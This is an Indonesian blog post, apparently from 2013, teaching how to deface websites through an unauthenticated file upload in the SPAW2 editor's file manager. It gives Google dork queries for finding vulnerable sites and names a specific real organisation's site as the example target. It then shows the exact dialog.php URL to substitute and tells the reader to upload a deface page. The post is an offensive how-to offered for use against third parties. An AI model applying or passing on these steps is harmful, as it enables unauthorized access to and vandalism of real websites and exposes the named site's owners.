Home » » Deface denagan spaw upload vulnerably

Deface denagan spaw upload vulnerably

Written By Sumitro Aji Prabowo on Minggu, 12 Mei 2013 | 23.48




Banyak exploit yang dapat mengupload file secara langsung, ok kali ini kami memberi tutorial sekaligus cara menggunakan exploit itu.

dorknya :
inurl:”spaw2/dialogs/” OR  inurl:”spaw2/uploads/files/”

Jika sudah dapat targetny, contoh targetnya :
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/CC%20Book/ชุดความรู้%20CC%20Vol2.pdf

bagian : spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf

GANTI DENGAN

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

MAKA HASILNYA SEPERTI INI

http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Akan tampil halaman untuk upload File.
Ganti menjadi files pada lokasi penyimpanan.
Browse file design Deface kamu, & upload.
Apabila file sukses diupload.akan terlihat file uploadtan tadi…

UdahGituAja

0 komentar:

Posting Komentar

Like us on Facebook
Follow us on Twitter
Recommend us on Google Plus